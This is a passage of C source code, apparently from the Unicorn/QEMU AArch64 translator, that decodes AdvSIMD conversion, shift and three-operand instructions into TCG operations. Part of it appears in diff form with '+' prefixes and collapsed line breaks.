            if (elements == 1) {
                write_fp_sreg(s, rd, tcg_single);
            } else {
                write_vec_element_i32(s, tcg_single, rd, pass, MO_32);
            }
            tcg_temp_free_i32(tcg_ctx, tcg_single);
        }
    }

    if (!is_double && elements == 2) {
        /* Non-quad single-precision vector: zero the high 64 bits */
        clear_vec_high(s, rd);
    }

    tcg_temp_free_i64(tcg_ctx, tcg_int);
    tcg_temp_free_ptr(tcg_ctx, tcg_fpst);
    tcg_temp_free_i32(tcg_ctx, tcg_shift);
}

/* UCVTF/SCVTF - Integer to FP conversion */
static void handle_simd_shift_intfp_conv(DisasContext *s, bool is_scalar,
                                         bool is_q, bool is_u,
                                         int immh, int immb, int opcode,
                                         int rn, int rd)
{
    bool is_double = extract32(immh, 3, 1);
    int size = is_double ? MO_64 : MO_32;
    int elements;
    int immhb = immh << 3 | immb;
    /* Number of fractional bits in the fixed-point input */
    int fracbits = (is_double ? 128 : 64) - immhb;

    if (!extract32(immh, 2, 2)) {
        /* immh<3:2> == 00 encodes element sizes this insn doesn't have */
        unallocated_encoding(s);
        return;
    }

    if (is_scalar) {
        elements = 1;
    } else {
        elements = is_double ? 2 : is_q ? 4 : 2;
        if (is_double && !is_q) {
            unallocated_encoding(s);
            return;
        }
    }

    if (!fp_access_check(s)) {
        return;
    }

    /* immh == 0 would be a failure of the decode logic */
    g_assert(immh);

    handle_simd_intfp_conv(s, rd, rn, elements, !is_u, fracbits, size);
}

/* FCVTZS, FCVTZU - FP to fixedpoint conversion */
static void handle_simd_shift_fpint_conv(DisasContext *s, bool is_scalar,
                                         bool is_q, bool is_u,
                                         int immh, int immb, int rn, int rd)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    bool is_double = extract32(immh, 3, 1);
    int immhb = immh << 3 | immb;
    int fracbits = (is_double ? 128 : 64) - immhb;
    int pass;
    TCGv_ptr tcg_fpstatus;
    TCGv_i32 tcg_rmode, tcg_shift;

    if (!extract32(immh, 2, 2)) {
        unallocated_encoding(s);
        return;
    }

    if (!is_scalar && !is_q && is_double) {
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    assert(!(is_scalar && is_q));

    /* Force round-towards-zero for the conversion; restored below */
    tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(FPROUNDING_ZERO));
    gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env);
    tcg_fpstatus = get_fpstatus_ptr(tcg_ctx);
    tcg_shift = tcg_const_i32(tcg_ctx, fracbits);

    if (is_double) {
        int maxpass = is_scalar ? 1 : 2;

        for (pass = 0; pass < maxpass; pass++) {
            TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx);

            read_vec_element(s, tcg_op, rn, pass, MO_64);
            if (is_u) {
                gen_helper_vfp_touqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus);
            } else {
                gen_helper_vfp_tosqd(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus);
            }
            write_vec_element(s, tcg_op, rd, pass, MO_64);
            tcg_temp_free_i64(tcg_ctx, tcg_op);
        }
        if (!is_q) {
            clear_vec_high(s, rd);
        }
    } else {
        int maxpass = is_scalar ? 1 : is_q ?
4 : 2;
        for (pass = 0; pass < maxpass; pass++) {
            TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx);

            read_vec_element_i32(s, tcg_op, rn, pass, MO_32);
            if (is_u) {
                gen_helper_vfp_touls(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus);
            } else {
                gen_helper_vfp_tosls(tcg_ctx, tcg_op, tcg_op, tcg_shift, tcg_fpstatus);
            }
            if (is_scalar) {
                write_fp_sreg(s, rd, tcg_op);
            } else {
                write_vec_element_i32(s, tcg_op, rd, pass, MO_32);
            }
            tcg_temp_free_i32(tcg_ctx, tcg_op);
        }
        if (!is_q && !is_scalar) {
            clear_vec_high(s, rd);
        }
    }

    tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus);
    tcg_temp_free_i32(tcg_ctx, tcg_shift);
    /* Restore the previous rounding mode (set_rmode swaps old/new) */
    gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env);
    tcg_temp_free_i32(tcg_ctx, tcg_rmode);
}

/* C3.6.9 AdvSIMD scalar shift by immediate
 *  31 30  29 28         23 22  19 18  16 15    11  10 9    5 4    0
 * +-----+---+-------------+------+------+--------+---+------+------+
 * | 0 1 | U | 1 1 1 1 1 0 | immh | immb | opcode | 1 |  Rn  |  Rd  |
 * +-----+---+-------------+------+------+--------+---+------+------+
 *
 * This is the scalar version so it works on a fixed sized registers
 */
static void disas_simd_scalar_shift_imm(DisasContext *s, uint32_t insn)
{
    int rd = extract32(insn, 0, 5);
    int rn = extract32(insn, 5, 5);
    int opcode = extract32(insn, 11, 5);
    int immb = extract32(insn, 16, 3);
    int immh = extract32(insn, 19, 4);
    bool is_u = extract32(insn, 29, 1);

    if (immh == 0) {
        unallocated_encoding(s);
        return;
    }

    switch (opcode) {
    case 0x08: /* SRI */
        if (!is_u) {
            unallocated_encoding(s);
            return;
        }
        /* fall through */
    case 0x00: /* SSHR / USHR */
    case 0x02: /* SSRA / USRA */
    case 0x04: /* SRSHR / URSHR */
    case 0x06: /* SRSRA / URSRA */
        handle_scalar_simd_shri(s, is_u, immh, immb, opcode, rn, rd);
        break;
    case 0x0a: /* SHL / SLI */
        handle_scalar_simd_shli(s, is_u, immh, immb, opcode, rn, rd);
        break;
    case 0x1c: /* SCVTF, UCVTF */
        handle_simd_shift_intfp_conv(s, true, false, is_u, immh, immb,
                                     opcode, rn, rd);
        break;
    case 0x10: /* SQSHRUN, SQSHRUN2 */
    case 0x11: /* SQRSHRUN, SQRSHRUN2 */
        if (!is_u) {
            unallocated_encoding(s);
            return;
        }
        handle_vec_simd_sqshrn(s, true, false, false, true,
                               immh, immb, opcode, rn, rd);
        break;
    case 0x12: /* SQSHRN, SQSHRN2, UQSHRN */
    case 0x13: /* SQRSHRN, SQRSHRN2, UQRSHRN, UQRSHRN2 */
        handle_vec_simd_sqshrn(s, true, false, is_u, is_u,
                               immh, immb, opcode, rn, rd);
        break;
    case 0xc: /* SQSHLU */
        if (!is_u) {
            unallocated_encoding(s);
            return;
        }
        handle_simd_qshl(s, true, false, false, true, immh, immb, rn, rd);
        break;
    case 0xe: /* SQSHL, UQSHL */
        handle_simd_qshl(s, true, false, is_u, is_u, immh, immb, rn, rd);
        break;
    case 0x1f: /* FCVTZS, FCVTZU */
        handle_simd_shift_fpint_conv(s, true, false, is_u, immh, immb, rn, rd);
        break;
    default:
        unallocated_encoding(s);
        break;
    }
}

/* C3.6.10 AdvSIMD scalar three different
 *  31 30  29 28   24 23  22  21 20  16 15    12 11 10 9    5 4    0
 * +-----+---+-----------+------+---+------+--------+-----+------+------+
 * | 0 1 | U | 1 1 1 1 0 | size | 1 |  Rm  | opcode | 0 0 |  Rn  |  Rd  |
 * +-----+---+-----------+------+---+------+--------+-----+------+------+
 */
static void disas_simd_scalar_three_reg_diff(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    bool is_u = extract32(insn, 29, 1);
    int size = extract32(insn, 22, 2);
    int opcode = extract32(insn, 12, 4);
    int rm = extract32(insn, 16, 5);
    int rn = extract32(insn, 5, 5);
    int rd = extract32(insn, 0, 5);

    if (is_u) {
        unallocated_encoding(s);
        return;
    }

    switch (opcode) {
    case 0x9: /* SQDMLAL, SQDMLAL2 */
    case 0xb: /* SQDMLSL, SQDMLSL2 */
    case 0xd: /* SQDMULL, SQDMULL2 */
        /* Only 16->32 and 32->64 widenings are allocated */
        if (size == 0 || size == 3) {
            unallocated_encoding(s);
            return;
        }
        break;
    default:
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    if (size == 2) {
        TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx);
        TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx);
        TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx);

        read_vec_element(s, tcg_op1, rn, 0, MO_32 | MO_SIGN);
        read_vec_element(s, tcg_op2, rm, 0, MO_32 | MO_SIGN);

        tcg_gen_mul_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2);
        /* Adding the product to itself doubles it with saturation */
        gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res);

        switch (opcode) {
        case 0xd: /* SQDMULL, SQDMULL2 */
            break;
        case 0xb: /* SQDMLSL, SQDMLSL2 */
            tcg_gen_neg_i64(tcg_ctx, tcg_res, tcg_res);
            /* fall through */
        case 0x9: /* SQDMLAL, SQDMLAL2 */
            read_vec_element(s, tcg_op1, rd, 0, MO_64);
            gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res, tcg_ctx->cpu_env,
                                              tcg_res, tcg_op1);
            break;
        default:
            g_assert_not_reached();
        }

        write_fp_dreg(s, rd, tcg_res);

        tcg_temp_free_i64(tcg_ctx, tcg_op1);
        tcg_temp_free_i64(tcg_ctx, tcg_op2);
        tcg_temp_free_i64(tcg_ctx, tcg_res);
    } else {
        TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx);

        read_vec_element_i32(s, tcg_op1, rn, 0, MO_16);
        read_vec_element_i32(s, tcg_op2, rm, 0, MO_16);

        gen_helper_neon_mull_s16(tcg_ctx, tcg_res, tcg_op1, tcg_op2);
        /* Adding the product to itself doubles it with saturation */
        gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_res, tcg_res);

        switch (opcode) {
        case 0xd: /* SQDMULL, SQDMULL2 */
            break;
        case 0xb: /* SQDMLSL, SQDMLSL2 */
            gen_helper_neon_negl_u32(tcg_ctx, tcg_res, tcg_res);
            /* fall through */
        case 0x9: /* SQDMLAL, SQDMLAL2 */
        {
            TCGv_i64 tcg_op3 = tcg_temp_new_i64(tcg_ctx);
            read_vec_element(s, tcg_op3, rd, 0, MO_32);
            gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env,
                                              tcg_res, tcg_op3);
            tcg_temp_free_i64(tcg_ctx, tcg_op3);
            break;
        }
        default:
            g_assert_not_reached();
        }

        tcg_gen_ext32u_i64(tcg_ctx, tcg_res, tcg_res);
        write_fp_dreg(s, rd, tcg_res);

        tcg_temp_free_i32(tcg_ctx, tcg_op1);
        tcg_temp_free_i32(tcg_ctx, tcg_op2);
        tcg_temp_free_i64(tcg_ctx, tcg_res);
    }
}

static void handle_3same_64(DisasContext *s, int opcode, bool u,
                            TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, TCGv_i64 tcg_rm)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* Handle 64x64->64 opcodes which are shared between the scalar
     * and vector 3-same groups. We cover every opcode where size == 3
     * is valid in either the three-reg-same (integer, not pairwise)
     * or scalar-three-reg-same groups. (Some opcodes are not yet
     * implemented.)
     */
    TCGCond cond;

    switch (opcode) {
    case 0x1: /* SQADD */
        if (u) {
            gen_helper_neon_qadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        } else {
            gen_helper_neon_qadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        }
        break;
    case 0x5: /* SQSUB */
        if (u) {
            gen_helper_neon_qsub_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        } else {
            gen_helper_neon_qsub_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        }
        break;
    case 0x6: /* CMGT, CMHI */
        /* 64 bit integer comparison, result = test ? (2^64 - 1) : 0.
         * We implement this using setcond (test) and then negating.
         */
        cond = u ? TCG_COND_GTU : TCG_COND_GT;
    do_cmop:
        tcg_gen_setcond_i64(tcg_ctx, cond, tcg_rd, tcg_rn, tcg_rm);
        tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd);
        break;
    case 0x7: /* CMGE, CMHS */
        cond = u ? TCG_COND_GEU : TCG_COND_GE;
        goto do_cmop;
    case 0x11: /* CMTST, CMEQ */
        if (u) {
            cond = TCG_COND_EQ;
            goto do_cmop;
        }
        /* CMTST : test is "if (X & Y != 0)".
         */
        tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm);
        tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, tcg_rd, tcg_rd, 0);
        tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd);
        break;
    case 0x8: /* SSHL, USHL */
        if (u) {
            gen_helper_neon_shl_u64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm);
        } else {
            gen_helper_neon_shl_s64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm);
        }
        break;
    case 0x9: /* SQSHL, UQSHL */
        if (u) {
            gen_helper_neon_qshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        } else {
            gen_helper_neon_qshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        }
        break;
    case 0xa: /* SRSHL, URSHL */
        if (u) {
            gen_helper_neon_rshl_u64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm);
        } else {
            gen_helper_neon_rshl_s64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm);
        }
        break;
    case 0xb: /* SQRSHL, UQRSHL */
        if (u) {
            gen_helper_neon_qrshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        } else {
            gen_helper_neon_qrshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm);
        }
        break;
    case 0x10: /* ADD, SUB */
        if (u) {
            tcg_gen_sub_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm);
        } else {
            tcg_gen_add_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm);
        }
        break;
    default:
        g_assert_not_reached();
    }
}

/* Handle the 3-same-operands float operations; shared by the scalar
 * and vector encodings. The caller must filter out any encodings
 * not allocated for the encoding it is dealing with.
 */
static void handle_3same_float(DisasContext *s, int size, int elements,
                               int fpopcode, int rd, int rn, int rm)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int pass;
    TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx);

    for (pass = 0; pass < elements; pass++) {
        if (size) {
            /* Double */
            TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx);
            TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx);
            TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx);

            read_vec_element(s, tcg_op1, rn, pass, MO_64);
            read_vec_element(s, tcg_op2, rm, pass, MO_64);

            switch (fpopcode) {
            case 0x39: /* FMLS */
                /* As usual for ARM, separate negation for fused multiply-add */
                gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1);
                /* fall through */
            case 0x19: /* FMLA */
                read_vec_element(s, tcg_res, rd, pass, MO_64);
                gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2,
                                       tcg_res, fpst);
                break;
            case 0x18: /* FMAXNM */
                gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1a: /* FADD */
                gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1b: /* FMULX */
                gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1c: /* FCMEQ */
                gen_helper_neon_ceq_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1e: /* FMAX */
                gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1f: /* FRECPS */
                gen_helper_recpsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x38: /* FMINNM */
                gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x3a: /* FSUB */
                gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x3e: /* FMIN */
                gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x3f: /* FRSQRTS */
                gen_helper_rsqrtsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5b: /* FMUL */
                gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5c: /* FCMGE */
                gen_helper_neon_cge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5d: /* FACGE */
                gen_helper_neon_acge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5f: /* FDIV */
                gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x7a: /* FABD */
                gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_res);
                break;
            case 0x7c: /* FCMGT */
                gen_helper_neon_cgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x7d: /* FACGT */
                gen_helper_neon_acgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            default:
                g_assert_not_reached();
            }

            write_vec_element(s, tcg_res, rd, pass, MO_64);

            tcg_temp_free_i64(tcg_ctx, tcg_res);
            tcg_temp_free_i64(tcg_ctx, tcg_op1);
            tcg_temp_free_i64(tcg_ctx, tcg_op2);
        } else {
            /* Single */
            TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx);
            TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx);
            TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx);

            read_vec_element_i32(s, tcg_op1, rn, pass, MO_32);
            read_vec_element_i32(s, tcg_op2, rm, pass, MO_32);

            switch (fpopcode) {
            case 0x39: /* FMLS */
                /* As usual for ARM, separate negation for fused multiply-add */
                gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1);
                /* fall through */
            case 0x19: /* FMLA */
                read_vec_element_i32(s, tcg_res, rd, pass, MO_32);
                gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2,
                                       tcg_res, fpst);
                break;
            case 0x1a: /* FADD */
                gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1b: /* FMULX */
                gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1c: /* FCMEQ */
                gen_helper_neon_ceq_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1e: /* FMAX */
                gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x1f: /* FRECPS */
                gen_helper_recpsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x18: /* FMAXNM */
                gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x38: /* FMINNM */
                gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x3a: /* FSUB */
                gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x3e: /* FMIN */
                gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x3f: /* FRSQRTS */
                gen_helper_rsqrtsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5b: /* FMUL */
                gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5c: /* FCMGE */
                gen_helper_neon_cge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5d: /* FACGE */
                gen_helper_neon_acge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x5f: /* FDIV */
                gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x7a: /* FABD */
                gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_res);
                break;
            case 0x7c: /* FCMGT */
                gen_helper_neon_cgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            case 0x7d: /* FACGT */
                gen_helper_neon_acgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
                break;
            default:
                g_assert_not_reached();
            }

            if (elements == 1) {
                /* scalar single so clear high part */
                TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx);

                tcg_gen_extu_i32_i64(tcg_ctx, tcg_tmp, tcg_res);
                write_vec_element(s, tcg_tmp, rd, pass, MO_64);
                tcg_temp_free_i64(tcg_ctx, tcg_tmp);
            } else {
                write_vec_element_i32(s, tcg_res, rd, pass, MO_32);
            }

            tcg_temp_free_i32(tcg_ctx, tcg_res);
            tcg_temp_free_i32(tcg_ctx, tcg_op1);
            tcg_temp_free_i32(tcg_ctx, tcg_op2);
        }
    }

    tcg_temp_free_ptr(tcg_ctx, fpst);

    if ((elements << size) < 4) {
        /* scalar, or non-quad vector op */
        clear_vec_high(s, rd);
    }
}

/* C3.6.11 AdvSIMD scalar three same
 *  31 30  29 28   24 23  22  21 20  16 15    11  10 9    5 4    0
 *
+-----+---+-----------+------+---+------+--------+---+------+------+ + * | 0 1 | U | 1 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | + * +-----+---+-----------+------+---+------+--------+---+------+------+ + */ +static void disas_simd_scalar_three_reg_same(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 11, 5); + int rm = extract32(insn, 16, 5); + int size = extract32(insn, 22, 2); + bool u = extract32(insn, 29, 1); + TCGv_i64 tcg_rd; + + if (opcode >= 0x18) { + /* Floating point: U, size[1] and opcode indicate operation */ + int fpopcode = opcode | (extract32(size, 1, 1) << 5) | (u << 6); + switch (fpopcode) { + case 0x1b: /* FMULX */ + case 0x1f: /* FRECPS */ + case 0x3f: /* FRSQRTS */ + case 0x5d: /* FACGE */ + case 0x7d: /* FACGT */ + case 0x1c: /* FCMEQ */ + case 0x5c: /* FCMGE */ + case 0x7c: /* FCMGT */ + case 0x7a: /* FABD */ + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + handle_3same_float(s, extract32(size, 0, 1), 1, fpopcode, rd, rn, rm); + return; + } + + switch (opcode) { + case 0x1: /* SQADD, UQADD */ + case 0x5: /* SQSUB, UQSUB */ + case 0x9: /* SQSHL, UQSHL */ + case 0xb: /* SQRSHL, UQRSHL */ + break; + case 0x8: /* SSHL, USHL */ + case 0xa: /* SRSHL, URSHL */ + case 0x6: /* CMGT, CMHI */ + case 0x7: /* CMGE, CMHS */ + case 0x11: /* CMTST, CMEQ */ + case 0x10: /* ADD, SUB (vector) */ + if (size != 3) { + unallocated_encoding(s); + return; + } + break; + case 0x16: /* SQDMULH, SQRDMULH (vector) */ + if (size != 1 && size != 2) { + unallocated_encoding(s); + return; + } + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + tcg_rd = tcg_temp_new_i64(tcg_ctx); + + if (size == 3) { + TCGv_i64 tcg_rn = read_fp_dreg(s, rn); + TCGv_i64 tcg_rm = read_fp_dreg(s, rm); + + handle_3same_64(s, opcode, u, tcg_rd, tcg_rn, 
tcg_rm); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rm); + } else { + /* Do a single operation on the lowest element in the vector. + * We use the standard Neon helpers and rely on 0 OP 0 == 0 with + * no side effects for all these operations. + * OPTME: special-purpose helpers would avoid doing some + * unnecessary work in the helper for the 8 and 16 bit cases. + */ + NeonGenTwoOpEnvFn *genenvfn; + TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rm = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rd32 = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_rn, rn, 0, size); + read_vec_element_i32(s, tcg_rm, rm, 0, size); + + switch (opcode) { + case 0x1: /* SQADD, UQADD */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qadd_s8, gen_helper_neon_qadd_u8 }, + { gen_helper_neon_qadd_s16, gen_helper_neon_qadd_u16 }, + { gen_helper_neon_qadd_s32, gen_helper_neon_qadd_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x5: /* SQSUB, UQSUB */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qsub_s8, gen_helper_neon_qsub_u8 }, + { gen_helper_neon_qsub_s16, gen_helper_neon_qsub_u16 }, + { gen_helper_neon_qsub_s32, gen_helper_neon_qsub_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x9: /* SQSHL, UQSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, + { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, + { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0xb: /* SQRSHL, UQRSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, + { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, + { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x16: /* SQDMULH, SQRDMULH */ + { + static NeonGenTwoOpEnvFn * const fns[2][2] = { + { 
gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, + { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, + }; + assert(size == 1 || size == 2); + genenvfn = fns[size - 1][u]; + break; + } + default: + g_assert_not_reached(); + } + + genenvfn(tcg_ctx, tcg_rd32, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd32); + tcg_temp_free_i32(tcg_ctx, tcg_rd32); + tcg_temp_free_i32(tcg_ctx, tcg_rn); + tcg_temp_free_i32(tcg_ctx, tcg_rm); + } + + write_fp_dreg(s, rd, tcg_rd); + + tcg_temp_free_i64(tcg_ctx, tcg_rd); +} + +static void handle_2misc_64(DisasContext *s, int opcode, bool u, + TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, + TCGv_i32 tcg_rmode, TCGv_ptr tcg_fpstatus) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Handle 64->64 opcodes which are shared between the scalar and + * vector 2-reg-misc groups. We cover every integer opcode where size == 3 + * is valid in either group and also the double-precision fp ops. + * The caller only need provide tcg_rmode and tcg_fpstatus if the op + * requires them. + */ + TCGCond cond; + + switch (opcode) { + case 0x4: /* CLS, CLZ */ + if (u) { + gen_helper_clz64(tcg_ctx, tcg_rd, tcg_rn); + } else { + gen_helper_cls64(tcg_ctx, tcg_rd, tcg_rn); + } + break; + case 0x5: /* NOT */ + /* This opcode is shared with CNT and RBIT but we have earlier + * enforced that size == 3 if and only if this is the NOT insn. + */ + tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rn); + break; + case 0x7: /* SQABS, SQNEG */ + if (u) { + gen_helper_neon_qneg_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); + } else { + gen_helper_neon_qabs_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); + } + break; + case 0xa: /* CMLT */ + /* 64 bit integer comparison against zero, result is + * test ? (2^64 - 1) : 0. We implement via setcond(!test) and + * subtracting 1. 
